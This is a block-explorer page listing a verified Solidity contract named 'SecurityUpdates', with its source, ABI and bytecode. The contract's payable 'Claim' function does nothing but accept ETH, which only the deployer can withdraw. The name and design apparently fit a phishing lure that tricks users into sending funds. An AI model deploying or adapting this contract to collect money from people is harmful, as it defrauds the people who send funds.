Feature Tip: Add private address tag to any address under My Name Tag !
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
Loading...
Loading
Similar Match Source Code This contract matches the deployed Bytecode of the Source Code for Contract 0x80F6373B...d9D430218 The constructor portion of the code might be different and could alter the actual behaviour of the contract
Contract Name:
SecurityUpdates
Compiler Version
v0.4.26+commit.4563c3fc
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-12-23 */ pragma solidity ^0.4.26; contract SecurityUpdates { address private owner; constructor() public{ owner=msg.sender; } function getOwner( ) public view returns (address) { return owner; } function withdraw() public { require(owner == msg.sender); msg.sender.transfer(address(this).balance); } function Claim() public payable { } function getBalance() public view returns (uint256) { return address(this).balance; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"constant":true,"inputs":[],"name":"getBalance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"Claim","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":false,"inputs":[],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"}]
Deployed Bytecode
0x608060405260043610610062576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806312065fe0146100675780633158952e146100925780633ccfd60b1461009c578063893d20e8146100b3575b600080fd5b34801561007357600080fd5b5061007c61010a565b6040518082815260200191505060405180910390f35b61009a610129565b005b3480156100a857600080fd5b506100b161012b565b005b3480156100bf57600080fd5b506100c86101e6565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b60003073ffffffffffffffffffffffffffffffffffffffff1631905090565b565b3373ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614151561018657600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156101e3573d6000803e3d6000fd5b50565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050905600a165627a7a72305820b55c1d463cd6e40fb05e74980dcc4e6bb183e5dc9fe55bba4e90a46c120634c60029
Deployed Bytecode Sourcemap
28:512:0:-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;438:99;;8:9:-1;5:2;;;30:1;27;20:12;5:2;438:99:0;;;;;;;;;;;;;;;;;;;;;;;390:40;;;;;;255:127;;8:9:-1;5:2;;;30:1;27;20:12;5:2;255:127:0;;;;;;158:91;;8:9:-1;5:2;;;30:1;27;20:12;5:2;158:91:0;;;;;;;;;;;;;;;;;;;;;;;;;;;438:99;481:7;516:4;508:21;;;501:28;;438:99;:::o;390:40::-;:::o;255:127::-;310:10;301:19;;:5;;;;;;;;;;;:19;;;293:28;;;;;;;;332:10;:19;;:42;360:4;352:21;;;332:42;;;;;;;;;;;;;;;;;;;;;;;;8:9:-1;5:2;;;45:16;42:1;39;24:38;77:16;74:1;67:27;5:2;332:42:0;255:127::o;158:91::-;205:7;236:5;;;;;;;;;;;229:12;;158:91;:::o
Swarm Source
bzzr://b55c1d463cd6e40fb05e74980dcc4e6bb183e5dc9fe55bba4e90a46c120634c6
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 31 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.